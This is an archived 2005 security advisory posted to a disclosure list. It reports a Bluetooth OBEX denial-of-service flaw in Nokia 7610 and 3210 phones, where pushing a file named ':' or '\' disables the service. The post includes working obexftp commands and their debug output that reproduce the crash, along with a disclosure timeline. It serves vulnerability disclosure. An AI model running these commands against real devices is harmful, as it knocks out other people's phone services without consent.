Nokia 7610, 3210 denial of service in OBEX.

From: A. Ramos (aramosf_at_unsec.net)
Date: 09/26/05

  • Next message: angelo_at_rosiello.org: "FreeBSD GNU Mailutils 0.6 imap4d exploit"
    Date: Mon, 26 Sep 2005 19:58:53 +0200
    To: aramosf@unsec.net
    
    
    

    Title: Nokia 7610, 3210 Denial of Service in OBEX.
    Severity: Low
    Affected: tested in nokia 7610 and nokia 3210 (maybe others symbian
    phones).
    Problem type: remote

    Details:
    ----------------------------------------------------------------------------------------------------------

    They are some flaw in the OBEX implementation in nokia 7610 (V4.0.437
    15-09-04 RH51), and others, that disable this service if you send
    archive with name ":" or "\".

    ----
     Quote of IROBEX12.pdf  Pag:40, section 4.3 -- (OBEX specification)
    "Pushing objects into the inbox Objects are pushed into the inbox by using 
    the PUT command with a Name header. The string in the Name header 
    should not contain any path characters such as :, / or \. Objects with
    improperly formed names should be rejected."
    ----
    The device ask for PIN if you are not paired or ask if you want accept a
    connection of the remote box, you need ACCEPT. It have low risk ,
    becouse dont work if you dont accept the incoming connection.
    If connection is established, the file is sended and they arent "New
    message arrived" message, like when you send correct archive. Its ok,
    the  filename is dropped.
    The problem is the OBEX service dont work anymore after this, if you
    tried to send other file or from some vcard from other device, you cant
    connect to the remote OBEX service again.
    Demostration with Linux as client:
    jim:~# hcitool scan
    Scanning ...
    	00:13:70:5E:1F:01	7610
    jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
    Browsing 00:13:70:5E:1F:01 ...
    Channel: 10
    No custom transport
    obexftp_cli_open()
    obexftp_cli_connect_uuid()
    Connecting...obexftp_cli_connect_uuid() BT 1
    cli_sync_request()
    obexftp_sync()
    client_done()
    client_done() Found connection number: -1022384746
    client_done() Sender identified
    obexftp_sync() OBEX_HandleInput = 31
    obexftp_sync() Done success=1
    done
    Sending ":"... obexftp_put_file() Sending : -> :
    build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
    cli_sync_request()
    cli_fillstream_from_file()
    cli_fillstream_from_file() Read 6 bytes
    cli_fillstream_from_file()
    cli_fillstream_from_file() Read 0 bytes
    obexftp_sync()
    obexftp_sync() OBEX_HandleInput = 0
    failed: :
    obexftp_cli_disconnect()
    Disconnecting...cli_sync_request()
    failed: disconnect
    obexftp_cli_close()
    # Error pushing other file after send ":" filename:
    jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
    Browsing 00:13:70:5E:1F:01 ...
    Channel: 10
    No custom transport
    obexftp_cli_open()
    obexftp_cli_connect_uuid()
    Connecting...obexftp_cli_connect_uuid() BT -1
    failed: connect
    Still trying to connect
    obexftp_cli_connect_uuid()
    Connecting...obexftp_cli_connect_uuid() BT -1
    failed: connect
    Still trying to connect
    obexftp_cli_connect_uuid()
    Connecting...obexftp_cli_connect_uuid() BT -1
    failed: connect
    Still trying to connect
    ----------------------------------------------------------------------------------------------------------
    Timeline:
    20 Sept 2005: bug found.
    21 Sept 2005: Nokia security contacted.
    24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
    26 Sept 2005: Full disclosure.
    --
    A. Ramos.
    mailto: <aramosf@unsec.net>
    http://www.unsec.net 
    
    



  • Next message: angelo_at_rosiello.org: "FreeBSD GNU Mailutils 0.6 imap4d exploit"

    Relevant Pages

    • [Full-disclosure] Nokia 7610, 3210 denial of service in OBEX.
      ... Nokia 7610, 3210 Denial of Service in OBEX. ... connection of the remote box, ... becouse dont work if you dont accept the incoming connection. ...
      (Full-Disclosure)
    • Re: Windows Mobile 5 bluetooth connexion
      ... Please see the Pocket PC Mag Expert Blog at ... connection. ... BT Dial-up networking is what the Nokia is offering (no Nokias ... Nokia from inside the Bluetooth device list? ...
      (microsoft.public.pocketpc)
    • Re: synching with Vista
      ... connections, etc., all stemming from Nokia trying to manage the ... connection in their own sofTware, rather than let Windows handle the ... I always plug a usb cable into a PC first, ... I am beginning to think the problems I have with it are not device specific but windows mobile specific. ...
      (microsoft.public.pocketpc)
    • Re: using mobile as modem
      ... I am tryint to use my nokia 6300 as a modem for my pc. ... made a dial up connection through the new connection wizard from ... The phone still needs to be told which profile to use and how this done ...
      (microsoft.public.windowsxp.help_and_support)
    • Re: synching with Vista
      ... While the sync process works Very well with Nokias, ... connections, etc., all stemming from Nokia trying to manage the ... connection in their own sofTware, rather than let Windows handle the ... Synching Windows Mobile has been problematic from day one. ...
      (microsoft.public.pocketpc)